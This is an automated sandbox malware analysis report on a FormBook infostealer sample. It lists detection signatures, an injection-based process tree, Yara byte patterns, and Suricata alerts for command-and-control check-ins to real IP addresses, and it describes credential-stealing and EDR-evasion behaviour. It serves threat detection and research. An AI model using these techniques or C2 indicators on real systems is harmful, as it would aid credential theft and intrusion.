Edit tour

Windows Analysis Report
bintoday1.exe

Overview

General Information

Sample name:	bintoday1.exe
Analysis ID:	1501089
MD5:	99d47f7fc3f035df01dc336375353e29
SHA1:	170df6ec2df3ad5406669aec1a3143ea96e9294d
SHA256:	69bdeb6d07e36540afe4f1084317c2dad449874becb4476c40e385ce06840a8e
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

bintoday1.exe (PID: 5020 cmdline: "C:\Users\user\Desktop\bintoday1.exe" MD5: 99D47F7FC3F035DF01DC336375353E29)

svchost.exe (PID: 5856 cmdline: "C:\Users\user\Desktop\bintoday1.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

eypfpUNFpbLX.exe (PID: 1008 cmdline: "C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

compact.exe (PID: 3580 cmdline: "C:\Windows\SysWOW64\compact.exe" MD5: 5CB107F69062D6D387F4F7A14737220E)

eypfpUNFpbLX.exe (PID: 4176 cmdline: "C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6468 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1419f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1419f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1419f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1419f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f5e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x42eb5:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2b014:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x25617a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x23e2d9:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x25617a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x23e2d9:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.470000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.470000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e7e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16942:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.470000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.470000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f5e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\bintoday1.exe", CommandLine: "C:\Users\user\Desktop\bintoday1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\bintoday1.exe", ParentImage: C:\Users\user\Desktop\bintoday1.exe, ParentProcessId: 5020, ParentProcessName: bintoday1.exe, ProcessCommandLine: "C:\Users\user\Desktop\bintoday1.exe", ProcessId: 5856, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\bintoday1.exe", CommandLine: "C:\Users\user\Desktop\bintoday1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\bintoday1.exe", ParentImage: C:\Users\user\Desktop\bintoday1.exe, ParentProcessId: 5020, ParentProcessName: bintoday1.exe, ProcessCommandLine: "C:\Users\user\Desktop\bintoday1.exe", ProcessId: 5856, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 62.149.128.40

Timestamp:	2024-08-29T12:25:13.583844+0200
SID:	2855464
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 62.149.128.40

Timestamp:	2024-08-29T12:25:10.204310+0200
SID:	2855464
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 65.21.196.90

Timestamp:	2024-08-29T12:25:50.963342+0200
SID:	2855464
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 18.162.124.14

Timestamp:	2024-08-29T12:25:38.203800+0200
SID:	2855465
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 18.162.124.14

Timestamp:	2024-08-29T12:25:33.110271+0200
SID:	2855464
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 35.244.245.121

Timestamp:	2024-08-29T12:24:59.347693+0200
SID:	2855464
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 199.59.243.226

Timestamp:	2024-08-29T12:24:42.139531+0200
SID:	2855464
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M4 - Source IP: 192.168.2.6 - Destination IP: 199.59.243.226

Timestamp:	2024-08-29T12:24:42.139531+0200
SID:	2856318
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 62.149.128.40

Timestamp:	2024-08-29T12:25:07.661982+0200
SID:	2855464
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 91.184.0.200

Timestamp:	2024-08-29T12:23:49.318401+0200
SID:	2855465
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 35.244.245.121

Timestamp:	2024-08-29T12:24:56.791562+0200
SID:	2855464
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 35.244.245.121

Timestamp:	2024-08-29T12:25:01.890347+0200
SID:	2855465
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 65.21.196.90

Timestamp:	2024-08-29T12:25:43.969232+0200
SID:	2855464
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-08-29T12:23:57.390269+0200
SID:	2855464
Severity:	1
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 91.184.0.200

Timestamp:	2024-08-29T12:23:44.256371+0200
SID:	2855464
Severity:	1
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-08-29T12:23:55.759943+0200
SID:	2855464
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 199.59.243.226

Timestamp:	2024-08-29T12:24:48.291355+0200
SID:	2855465
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 199.59.243.226

Timestamp:	2024-08-29T12:24:39.581037+0200
SID:	2855464
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 199.59.243.226

Timestamp:	2024-08-29T12:24:45.900451+0200
SID:	2855464
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-08-29T12:24:34.027077+0200
SID:	2855465
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 35.244.245.121

Timestamp:	2024-08-29T12:24:54.241146+0200
SID:	2855464
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 65.21.196.90

Timestamp:	2024-08-29T12:25:46.534498+0200
SID:	2855464
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 62.149.128.40

Timestamp:	2024-08-29T12:25:16.116110+0200
SID:	2855465
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 198.57.245.28

Timestamp:	2024-08-29T12:23:25.984476+0200
SID:	2855465
Severity:	1
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 18.162.124.14

Timestamp:	2024-08-29T12:25:35.642394+0200
SID:	2855464
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 91.184.0.200

Timestamp:	2024-08-29T12:23:41.675094+0200
SID:	2855464
Severity:	1
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 91.184.0.200

Timestamp:	2024-08-29T12:23:46.797589+0200
SID:	2855464
Severity:	1
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 18.162.124.14

Timestamp:	2024-08-29T12:25:30.544492+0200
SID:	2855464
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-08-29T12:24:01.017199+0200
SID:	2855464
Severity:	1
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: bintoday1.exe	Virustotal: Detection: 63%			Perma Link
Source: bintoday1.exe	ReversingLabs: Detection: 63%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: bintoday1.exe

Joe Sandbox ML: detected

Source: bintoday1.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: compact.pdbGCTL source: svchost.exe, 00000002.00000003.2416928087.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2417029817.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4020528447.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eypfpUNFpbLX.exe, 00000006.00000000.2369272396.00000000005FE000.00000002.00000001.01000000.00000005.sdmp, eypfpUNFpbLX.exe, 00000009.00000000.2528816800.00000000005FE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: bintoday1.exe, 00000000.00000003.2184813906.0000000003780000.00000004.00001000.00020000.00000000.sdmp, bintoday1.exe, 00000000.00000003.2178684389.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346609007.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2348425557.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.000000000319E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2460297074.0000000000986000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002EFE000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002D60000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2463034402.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bintoday1.exe, 00000000.00000003.2184813906.0000000003780000.00000004.00001000.00020000.00000000.sdmp, bintoday1.exe, 00000000.00000003.2178684389.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2460602943.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346609007.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2348425557.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.000000000319E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 00000007.00000003.2460297074.0000000000986000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002EFE000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002D60000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2463034402.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compact.pdb source: svchost.exe, 00000002.00000003.2416928087.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2417029817.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4020528447.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: compact.exe, 00000007.00000002.4015509843.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4026214953.000000000338C000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2753680676.0000000019EAC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: compact.exe, 00000007.00000002.4015509843.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4026214953.000000000338C000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2753680676.0000000019EAC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BFDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00BFDBBE
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BCC2A2 FindFirstFileExW,	0_2_00BCC2A2
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C068EE FindFirstFileW,FindClose,	0_2_00C068EE
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C0698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00C0698F
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BFD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00BFD076
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BFD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00BFD3A9
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C09642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C09642
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C0979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C0979D
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C09B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00C09B2B
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C05C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00C05C97
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004EC570 FindFirstFileW,FindNextFileW,FindClose,	7_2_004EC570

Source: C:\Windows\SysWOW64\compact.exe	Code function: 4x nop then xor eax, eax	7_2_004D9C10
Source: C:\Windows\SysWOW64\compact.exe	Code function: 4x nop then pop edi	7_2_004F2665
Source: C:\Windows\SysWOW64\compact.exe	Code function: 4x nop then mov ebx, 00000004h	7_2_00AD04E0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49725 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49735 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.6:49735 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49726 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49747 -> 18.162.124.14:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49746 -> 18.162.124.14:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49736 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49722 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49744 -> 62.149.128.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49739 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49728 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49727 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49743 -> 62.149.128.40:80
